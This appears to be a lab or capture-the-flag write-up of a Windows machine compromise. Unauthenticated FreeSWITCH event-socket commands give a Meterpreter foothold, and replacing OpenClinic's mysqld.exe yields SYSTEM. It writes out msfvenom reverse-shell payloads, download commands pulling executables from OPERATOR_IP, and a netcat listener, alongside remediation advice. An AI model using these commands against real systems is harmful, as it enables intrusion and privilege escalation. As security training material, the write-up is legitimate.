FreeSWITCH event-socket RCE and OpenClinic service binary hijack
Foundations Windows engagement: unauthenticated FreeSWITCH mod_event_socket on 8021 (EDB-47799) executed commands as Nekrotic; OpenClinic GA LPE (EDB-50448) replaced mysqld.exe for a SYSTEM shell after reboot.
- Case files
- FreeSWITCH event-socket RCE and OpenClinic service binary hijack
Port 8021 accepted FreeSWITCH event-socket commands without auth. A Meterpreter foothold as Nekrotic swapped OpenClinic’s mysqld.exe; reboot returned SYSTEM.
EDB-47799 against 8021 returned whoami as Nekrotic and staged a Meterpreter exe.
Replaced mariadb\bin\mysqld.exe with a reverse shell; reboot started SYSTEM.
Engagement summary
Port 8021 accepted FreeSWITCH event-socket commands without auth. A Meterpreter foothold as Nekrotic swapped OpenClinic’s mysqld.exe; reboot returned SYSTEM.
FLATLINE exposed RDP on 3389 and FreeSWITCH mod_event_socket on 8021. Exploit-DB 47799 sent unauthenticated commands as WIN-EOM4PK0578N\Nekrotic, enough to read the user artifact and stage a Meterpreter payload. Under C:\projects\openclinic\mariadb\bin, OpenClinic GA (EDB-50448) ran mysqld.exe as a privileged service. We backed up the real binary, dropped an msfvenom reverse shell named mysqld.exe, and Restart-Computer — the service start gave a SYSTEM shell and the root artifact.
Business impact
Unauthenticated FreeSWITCH event sockets are remote command execution on VoIP hosts. Writable service binaries under application trees are SYSTEM after the next restart. Bind 8021 to localhost with a strong password, patch FreeSWITCH, and protect service binary paths with ACLs that deny user write.
FreeSWITCH event-socket RCE
EDB-47799 against 8021 returned whoami as Nekrotic and staged a Meterpreter exe.
OPERATOR · NMAP
savvy@lab:~$ nmap -sV -sC -Pn 10.201.101.104
3389/tcp open ms-wbt-server
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
OPERATOR · EDB-47799
savvy@lab:~$ python3 47799.txt 10.201.101.104 whoami
win-eom4pk0578n\nekrotic
savvy@lab:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=OPERATOR_IP LPORT=4444 -f exe > payload.exe
savvy@lab:~$ python3 47799.txt 10.201.101.104 "powershell Invoke-WebRequest -URI http://OPERATOR_IP:8000/payload.exe -o C:\\Users\\Nekrotic\\Desktop\\payload.exe"
savvy@lab:~$ msfconsole -q
msf6 > use multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > run
savvy@lab:~$ python3 47799.txt 10.201.101.104 "C:\\Users\\Nekrotic\\Desktop\\payload.exe"
Meterpreter session opened
OpenClinic mysqld.exe hijack
Replaced mariadb\bin\mysqld.exe with a reverse shell; reboot started SYSTEM.
OPERATOR · SERVICE HIJACK
savvy@lab:~$ msfvenom -p windows/shell_reverse_tcp LHOST=OPERATOR_IP LPORT=8900 -f exe > mysql.exe
savvy@lab:~$ nc -lnvp 8900
# meterpreter: cd C:\projects\openclinic\mariadb\bin
meterpreter > shell
C:\...> Move-Item mysqld.exe mysqld.bak
C:\...> certutil.exe -urlcache -split -f http://OPERATOR_IP:8000/mysql.exe mysqld.exe
C:\...> Restart-Computer
C:\Windows\system32>
C:\Windows\system32> whoami
nt authority\system
Remediation
Require event-socket auth and firewall 8021. Upgrade FreeSWITCH. Lock OpenClinic/MariaDB binary directories to Administrators-only write; monitor service binary hash changes.